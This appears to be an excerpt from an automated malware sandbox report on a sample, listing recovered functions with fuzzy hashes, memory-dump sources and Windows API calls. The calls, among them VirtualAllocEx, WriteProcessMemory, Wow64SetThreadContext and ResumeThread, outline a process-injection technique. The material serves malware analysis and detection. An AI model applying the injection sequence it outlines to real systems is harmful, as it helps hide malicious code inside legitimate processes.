:, xrefs: 0733103C
4']q, xrefs: 073311AB
~, xrefs: 07330FD2
paq, xrefs: 07331286

Memory Dump Source

Source File: 00000009.00000002.2070281727.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7330000_mQpdTSxCjbPop.jbxd

Similarity

API ID:
String ID: 4']q$:$paq$~
API String ID: 0-2498672421
Opcode ID: 0b8815a334d1adc393d4761dc193988a72a8069cda58c3cace35ad863a8e2373
Instruction ID: bd65fb594d1db95b70ca1a211945bf6bc283dcaf75704b6e4753b2167628ea49
Opcode Fuzzy Hash: 0b8815a334d1adc393d4761dc193988a72a8069cda58c3cace35ad863a8e2373
Instruction Fuzzy Hash: 6042E3B5A00619DFEB25CFA9C980A9DBBB2FF49304F1580E9E509AB221D731DD91DF10

Uniqueness

Uniqueness Score: -1.00%

Function 07330786 Relevance: 5.2, Strings: 4, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 07330973
$]q, xrefs: 07330894
$]q, xrefs: 0733087E
$]q, xrefs: 0733095D

Memory Dump Source

Source File: 00000009.00000002.2070281727.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7330000_mQpdTSxCjbPop.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 0869380a0af7c66a0b5e3a55bb02ce0df565a877da8b8d981905470f2d2ab559
Instruction ID: a0f359ec75886bd3f9bb6cf9b1c3a1bcb1696f16d60d8df8281d5846fb91bb55
Opcode Fuzzy Hash: 0869380a0af7c66a0b5e3a55bb02ce0df565a877da8b8d981905470f2d2ab559
Instruction Fuzzy Hash: 31A1B774E002298FDB64DF58C990B9DBBB2FF88704F1085AAE809A7355DB359D86CF50

Uniqueness

Uniqueness Score: -1.00%

Function 07331A30 Relevance: 2.6, Strings: 2, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8aq, xrefs: 073319D2
&, xrefs: 07331A53

Memory Dump Source

Source File: 00000009.00000002.2070281727.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7330000_mQpdTSxCjbPop.jbxd

Similarity

API ID:
String ID: &$8aq
API String ID: 0-4028060730
Opcode ID: 9b200f87993d889e759a62940bd9d2546289d5c3baff03aa83255db775b5128e
Instruction ID: c840e0a8074265624894fdd7632c837a6dcf1c4ad0e50aa57384710f51713fbc
Opcode Fuzzy Hash: 9b200f87993d889e759a62940bd9d2546289d5c3baff03aa83255db775b5128e
Instruction Fuzzy Hash: 4C3116F4E5560DCBEB20CFB8D5409ADBBF9EB0A350F205A25D41EFB640D6309941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 073B7A84 Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073B7CC6

Memory Dump Source

Source File: 00000009.00000002.2070547821.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73b0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 64ac143692f70ffc9c36fb4dc5f1c22335ea51ba56d9fadd048f4b0b16dc7d22
Instruction ID: 592ae369939a1e174958d7bb0907af7befb689ad55dbf4c4ea99ef00f67eaae2
Opcode Fuzzy Hash: 64ac143692f70ffc9c36fb4dc5f1c22335ea51ba56d9fadd048f4b0b16dc7d22
Instruction Fuzzy Hash: 7FA19FB1D0021ACFEB20CF68C841BEDBBB2FF84314F1485AAD908A7640DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 073B7A90 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073B7CC6

Memory Dump Source

Source File: 00000009.00000002.2070547821.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73b0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: fdf64c0d0a86f455217218c6b16d7428bf5cdbeaf6d0b2205a34ee9aebd4220a
Instruction ID: 58fe55becaaf258f35a08b62bb717001a008a248ee8dce54427527be0a6e3d1d
Opcode Fuzzy Hash: fdf64c0d0a86f455217218c6b16d7428bf5cdbeaf6d0b2205a34ee9aebd4220a
Instruction Fuzzy Hash: C3918EB1D0021ACFEB24DF68C841BEDBBB2FF84314F1485AAD909A7650DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 013EB210 Relevance: 1.7, APIs: 1, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 013EB466

Memory Dump Source

Source File: 00000009.00000002.2064948663.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13e0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ce46627f19c3a581d14984a6c0f75fc9465714211f42488af081b44dd8f89525
Instruction ID: dbc625f5150eea671a78d56f52f7e2da73dcb8573a13b0701afda66f46c8a881
Opcode Fuzzy Hash: ce46627f19c3a581d14984a6c0f75fc9465714211f42488af081b44dd8f89525
Instruction Fuzzy Hash: EE815770A00B158FDB25DF6AD14875ABBF5FF48308F008A2DD48ADBA94DB75E845CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05430BFC Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05434381

Memory Dump Source

Source File: 00000009.00000002.2069330564.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5430000_mQpdTSxCjbPop.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 11fd08456ace2a73f19e57b7268297a47c68ff5f52161cdc1d6e1a7cbcd9dd99
Instruction ID: 1a7974cb84cbe70d26dd5c44ec0f299f80fe0f74be365a25f6a72532315925e2
Opcode Fuzzy Hash: 11fd08456ace2a73f19e57b7268297a47c68ff5f52161cdc1d6e1a7cbcd9dd99
Instruction Fuzzy Hash: 6041F8B5A002098FCB14DF99C489AEAFBF5FF88314F24C559D519AB361D774A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 013E450C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 013E5F41

Memory Dump Source

Source File: 00000009.00000002.2064948663.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13e0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 0acf97785d3d280881e5b289b40bbacd378989ceeb239b2e43544d7cb8d5ee55
Instruction ID: 13c2e49e7de1e089ecbe288262bd3d8d7c47b3bbadfd839384e5e0dea33320bf
Opcode Fuzzy Hash: 0acf97785d3d280881e5b289b40bbacd378989ceeb239b2e43544d7cb8d5ee55
Instruction Fuzzy Hash: D841B2B5C00719CBDB24DFA9C888B9DBBF5FF45308F20806AD408AB255DB75694ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 013E5E85 Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 013E5F41

Memory Dump Source

Source File: 00000009.00000002.2064948663.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13e0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e460b5407ad9abd5794f4b8e25bf8f49157083a5cd10a73ed43da61791af7c2b
Instruction ID: a70aad9d0197df86e1c0b7d21d451516e21a03f4821a6c26e5e43b07758e5ca0
Opcode Fuzzy Hash: e460b5407ad9abd5794f4b8e25bf8f49157083a5cd10a73ed43da61791af7c2b
Instruction Fuzzy Hash: 9E41C2B5C00719CEDB24CFA9C984B9DBBF5FF49308F20806AD408AB255DB75594ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 073B7800 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073B7898

Memory Dump Source

Source File: 00000009.00000002.2070547821.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73b0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ab4f5501940df64e29d4461083453b9f18fcb685c251dc175eef4cecfc8d08c7
Instruction ID: b6604371a84a7308e24f4fbdb96294f550839f9f516184d803ad88288bbc1269
Opcode Fuzzy Hash: ab4f5501940df64e29d4461083453b9f18fcb685c251dc175eef4cecfc8d08c7
Instruction Fuzzy Hash: 252146B19003499FDB10CFA9C885BEEBBF1FF88314F10842AE519A7250C7789945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 073B7808 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073B7898

Memory Dump Source

Source File: 00000009.00000002.2070547821.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73b0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 07b1923f0bb077d6c3c38e78e7aec64acc6e9467b88ed546044a43efa0a1078b
Instruction ID: dfecbd2492e2673c7993bacf3c1a7a50015bc5df9c06829cd6659d8e3b3023c6
Opcode Fuzzy Hash: 07b1923f0bb077d6c3c38e78e7aec64acc6e9467b88ed546044a43efa0a1078b
Instruction Fuzzy Hash: 102139B5D003499FDB10DFAAC885BEEBBF5FF48310F10842AE919A7250D7789944CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 073B78F0 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073B7978

Memory Dump Source

Source File: 00000009.00000002.2070547821.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73b0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 06626de556d4f5ea96bb2aafd4db9a5a438a108a426346f1fccdf33d80c0644e
Instruction ID: 6f3ec7beebef28dbbacb54d244d13ad31890d8e073e3f435d61e354a3f607313
Opcode Fuzzy Hash: 06626de556d4f5ea96bb2aafd4db9a5a438a108a426346f1fccdf33d80c0644e
Instruction Fuzzy Hash: A42128B18002499FDB10DFAAC880AEEFBF5FF48310F50842AE959A7250D7789945CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 013ECD80 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013ED6A6,?,?,?,?,?), ref: 013ED767

Memory Dump Source

Source File: 00000009.00000002.2064948663.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13e0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8867807341d0503cb5edb1ed971b8497ad2d4752b83bbdf1ee9cbfbf62e7f7f9
Instruction ID: 2d7f5d4cae8515cb61ceb9c9f72ca80ae5001a35208849a9ad66987ecb831f46
Opcode Fuzzy Hash: 8867807341d0503cb5edb1ed971b8497ad2d4752b83bbdf1ee9cbfbf62e7f7f9
Instruction Fuzzy Hash: 0621E3B59003589FDB10CFAAD584AEEBBF8EB48314F14841AE918A7350D378A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 013ED6D8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013ED6A6,?,?,?,?,?), ref: 013ED767

Memory Dump Source

Source File: 00000009.00000002.2064948663.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13e0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2c72baab4b8ca6c56074f2655cbf26db4944349d401fcb04180b30a1183362fb
Instruction ID: bdbff8a77ffd97b34f05b23b1e124ccd2d99f1bc87af6a1e0e83c7bd83040575
Opcode Fuzzy Hash: 2c72baab4b8ca6c56074f2655cbf26db4944349d401fcb04180b30a1183362fb
Instruction Fuzzy Hash: 3521E5B59002589FDB10CFAAD984ADEBFF9EB48310F14841AE958A3350D378A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 073B7231 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073B72B6

Memory Dump Source

Source File: 00000009.00000002.2070547821.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73b0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 43fa6dfb7dae6e60ed5a50635ebc06c217ddf7ffa244cb2311d4b01c6ebd75e6
Instruction ID: ce255b5ebea6bd73572ae50a784f15cc66a0976f74be5ab986f9481a7c7ddacc
Opcode Fuzzy Hash: 43fa6dfb7dae6e60ed5a50635ebc06c217ddf7ffa244cb2311d4b01c6ebd75e6
Instruction Fuzzy Hash: A52157B1D002098FDB10DFAAC4847EEBBF5EF88324F14842AD559A7241CB789985CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 073B7238 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073B72B6

Memory Dump Source

Source File: 00000009.00000002.2070547821.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73b0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d01180ff7757f52193424239bc275644d9ba4f8dcdfec8b8497dcbfdc0364506
Instruction ID: 7b5b16fc0090f76c3746e96d85497b13dedbbd534c8d73a3d20ea34c232a7e10
Opcode Fuzzy Hash: d01180ff7757f52193424239bc275644d9ba4f8dcdfec8b8497dcbfdc0364506
Instruction Fuzzy Hash: 6C2138B1D002098FDB10DFAAC4857EEBBF5EF88314F14842AD519A7341CB789944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 073B78F8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073B7978

Memory Dump Source

Source File: 00000009.00000002.2070547821.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73b0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 54ff1966eb86b3dc93f79d269ed4ae48f0fb8f897634262079a40c3d8525429e
Instruction ID: ccf0b78fe1b3b90a1d4ad3cb830805f275281006a9861d1147b963e0c80aafeb
Opcode Fuzzy Hash: 54ff1966eb86b3dc93f79d269ed4ae48f0fb8f897634262079a40c3d8525429e
Instruction Fuzzy Hash: 312107B1C003599FDB10DFAAC885AEEFBF5FF48310F50842AE519A7250D7789945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013EAC50 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013EB4E1,00000800,00000000,00000000), ref: 013EB6F2

Memory Dump Source

Source File: 00000009.00000002.2064948663.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13e0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3c153f9457e5c69f228f89916c6169ee2bd55b87cbefd5fa57a40436d0820a2a
Instruction ID: 684ab7aa057c9a47687c374384cb0565339d65663b77b7fa4d8f24b6046b5f84
Opcode Fuzzy Hash: 3c153f9457e5c69f228f89916c6169ee2bd55b87cbefd5fa57a40436d0820a2a
Instruction Fuzzy Hash: 111126B68003498FDB10DF9AC448ADEFBF4EB58324F10842AD519B7650C3B9A544CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 013EB680 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013EB4E1,00000800,00000000,00000000), ref: 013EB6F2

Memory Dump Source

Source File: 00000009.00000002.2064948663.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13e0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f2ecff13e33daaeee89c7e3e553f6a4ac7ed82060c8716a1f7c0cb146b6b6c05
Instruction ID: 36475d410389670914124745d49d6b0733080a51fbb535d60ba22969e511fa8b
Opcode Fuzzy Hash: f2ecff13e33daaeee89c7e3e553f6a4ac7ed82060c8716a1f7c0cb146b6b6c05
Instruction Fuzzy Hash: 971144B68003498FDB10CF9AD448ADEFFF4EF58314F14841AD519A7650C378A544CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 073B7740 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073B77B6

Memory Dump Source

Source File: 00000009.00000002.2070547821.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73b0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 56b312b63488b139fb8a892592e4ddb3d7c6b6d13e9472a1cc33515c39ab3598
Instruction ID: ebb71595987cdc94f61ca4207c8cb9e79d361159bf0b9d9b304484a429e6fba9
Opcode Fuzzy Hash: 56b312b63488b139fb8a892592e4ddb3d7c6b6d13e9472a1cc33515c39ab3598
Instruction Fuzzy Hash: 0F116AB59002499FDB20DFA9C845BEEBFF5FF88314F24841AE559A7250C7799540CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 073B7748 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073B77B6

Memory Dump Source

Source File: 00000009.00000002.2070547821.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73b0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6218e30249d6499ae8731b8e3b79332e19210c374d01fb629b521c6b802836ef
Instruction ID: 0e42339027166468b0143ba853bb3d59302572783ca9362d08c7067ca58c0061
Opcode Fuzzy Hash: 6218e30249d6499ae8731b8e3b79332e19210c374d01fb629b521c6b802836ef
Instruction Fuzzy Hash: 031137B58002499FDB20DFAAC845AEEBFF5EF88314F10841AE519A7250C779A940CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 073B7180 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 073B71EA

Memory Dump Source

Source File: 00000009.00000002.2070547821.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73b0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 72fba8132e1ce2b15aa6e95a0ce26a8e366f0de9266013215d142793a225f679
Instruction ID: e945dcfe99fa89e338230896ca5d544c7200e4d09f27f82e73a31791c0285613
Opcode Fuzzy Hash: 72fba8132e1ce2b15aa6e95a0ce26a8e366f0de9266013215d142793a225f679
Instruction Fuzzy Hash: E31179B18003488FDB20DFAAC8447EEFBF4EF88320F20841AD519A7240C778A940CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 073B7188 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 073B71EA

Memory Dump Source

Source File: 00000009.00000002.2070547821.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73b0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b44aa1294e3bef44eff3e5a80c0d7048cc26e89a5dbd9e1ac012471635210273
Instruction ID: 5e94b99c703a40aeba1775a83e78fa1d1154149e24b1ac08f7d239145ae3534a
Opcode Fuzzy Hash: b44aa1294e3bef44eff3e5a80c0d7048cc26e89a5dbd9e1ac012471635210273
Instruction Fuzzy Hash: 4D113AB1D002498FDB20DFAAC8457EEFBF5EF89314F20841AD519A7650CB79A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 073BB4A1 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 073BB505

Memory Dump Source

Source File: 00000009.00000002.2070547821.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73b0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 1a2432603cee3f03fc3e8669db02fa613c0b7685d56833a9fe5b7806c392b8b5
Instruction ID: 74c624363e82cb0b73971aaa340cb9a0fe9ff1abb2f96aea81536b8d3deebc56
Opcode Fuzzy Hash: 1a2432603cee3f03fc3e8669db02fa613c0b7685d56833a9fe5b7806c392b8b5
Instruction Fuzzy Hash: BE1136B58003499FDB10CF99C484BDEFFF8EB48320F10840AD558A7611C375A984CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 013EB400 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 013EB466

Memory Dump Source

Source File: 00000009.00000002.2064948663.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13e0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: cf5c72fc9f194f0e20d78760f7117c8890fd4c559c9d6d87c66f89c96e8aa8f5
Instruction ID: d6293487e28f26defb3cb35fb3f5b6713b1e4c6caf677f75c2ed2e21b83d9e42
Opcode Fuzzy Hash: cf5c72fc9f194f0e20d78760f7117c8890fd4c559c9d6d87c66f89c96e8aa8f5
Instruction Fuzzy Hash: 3A110FB5C003598FDB10DF9AC448A9EFBF4EB89314F10841AD518B7654C379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 073B9768 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 073BB505

Memory Dump Source

Source File: 00000009.00000002.2070547821.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73b0000_mQpdTSxCjbPop.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 3c7283795069927928f3407beb238b340c86f2a4ed43d301f09e37dc4ab9c5b9
Instruction ID: d1aab7c17f9b38f930ed53c7ddb7556f8ff84787e41913ac693f609c1b56672e
Opcode Fuzzy Hash: 3c7283795069927928f3407beb238b340c86f2a4ed43d301f09e37dc4ab9c5b9
Instruction Fuzzy Hash: DE11F5B58003499FDB20DF99C485BDEFBF8EB59314F10841AE518A7610C375A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07331820 Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

8aq, xrefs: 073319D2

Memory Dump Source

Source File: 00000009.00000002.2070281727.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7330000_mQpdTSxCjbPop.jbxd

Similarity

API ID:
String ID: 8aq
API String ID: 0-538729646
Opcode ID: d4d41a36b8421f6a5d814be2537d2be8f87a82706f840af6678dad52a052251e
Instruction ID: ebda70e7506f281743299462ec38844995efed1d52b2dc4dce4e4088800372df
Opcode Fuzzy Hash: d4d41a36b8421f6a5d814be2537d2be8f87a82706f840af6678dad52a052251e
Instruction Fuzzy Hash: 0C51E1B4E1561DDFDB10CFA9D4809ADBBFAEB0A310F10952AE41AAB350E7309942CF50

Uniqueness

Uniqueness Score: -1.00%

Function 07331810 Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

8aq, xrefs: 073319D2

Memory Dump Source

Source File: 00000009.00000002.2070281727.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7330000_mQpdTSxCjbPop.jbxd

Similarity

API ID:
String ID: 8aq
API String ID: 0-538729646
Opcode ID: 82bbfa666962f7ce47645bea5b99c6beb6119f5c128c757b22058cf0e661f1f2
Instruction ID: 4ab5a2a36e2691019a781e8b02654847c222831f2fd8b9b0290a31b3737574a8
Opcode Fuzzy Hash: 82bbfa666962f7ce47645bea5b99c6beb6119f5c128c757b22058cf0e661f1f2
Instruction Fuzzy Hash: 7E5103B4E1561D9FDB10CFA9D5809ADBBF5FB0A310F10992AE41AEB350E7309942CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0733B5C4 Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

Te]q, xrefs: 0733C311

Memory Dump Source

Source File: 00000009.00000002.2070281727.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7330000_mQpdTSxCjbPop.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: 911603c2e6af2de610fd84f71eeae923b72d7e202fc3a25f2462989e0d4d65ce
Instruction ID: 159fa59e9477b485743d7589d70af80fb6726065771a1a23a3514cbe5240bdd7
Opcode Fuzzy Hash: 911603c2e6af2de610fd84f71eeae923b72d7e202fc3a25f2462989e0d4d65ce
Instruction Fuzzy Hash: F7518171B0021A8FDB14EFB9D8949AFBBF6EFC8224B158929E419D7390DF309C058761

Uniqueness

Uniqueness Score: -1.00%

Function 0733C0D0 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

Te]q, xrefs: 0733C13B

Memory Dump Source

Source File: 00000009.00000002.2070281727.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7330000_mQpdTSxCjbPop.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: c666e5330afbd52b619aba1cf19cc808f4c91c636d52aba7ef426d3f9813544e
Instruction ID: 3f3f01771e43c00a02a9ee3c01f874f857b12b46d7376883beec77215e9f3dcd
Opcode Fuzzy Hash: c666e5330afbd52b619aba1cf19cc808f4c91c636d52aba7ef426d3f9813544e
Instruction Fuzzy Hash: 5D1151B1F0021A8BDB14EBB999115EEB6F6AFC5715B10407AC509EB384EF358D02D7A1

Uniqueness

Uniqueness Score: -1.00%

